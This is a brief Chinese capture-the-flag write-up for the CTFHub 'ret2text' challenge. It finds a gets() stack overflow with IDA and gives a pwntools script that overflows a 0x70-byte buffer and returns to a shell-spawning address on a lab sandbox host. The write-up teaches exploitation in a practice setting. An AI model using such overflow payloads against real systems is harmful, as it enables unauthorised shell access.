CTFHUB-PWN-ret2text

简单栈溢出

下载文件 checksec看看

CTFHUB-PWN-ret2text_第1张图片

64位

放入ida64 查看字符串

CTFHUB-PWN-ret2text_第2张图片

 得到shell

然后看看主函数怎么输入

CTFHUB-PWN-ret2text_第3张图片

get的危险函数

记住 v4为70h

然后看看shell的地址是多少CTFHUB-PWN-ret2text_第4张图片

CTFHUB-PWN-ret2text_第5张图片

 4007B8

然后我们可以开始写payload

from pwn import *
p=remote('challenge-63285d134b7b0e28.sandbox.ctfhub.com',37331)
payload=b'A'*(0x70+0x08)+p64(0x4007B8)
p.sendline(payload)
p.interactive()

CTFHUB-PWN-ret2text_第6张图片

 

你可能感兴趣的:(PWN的学习,开发语言)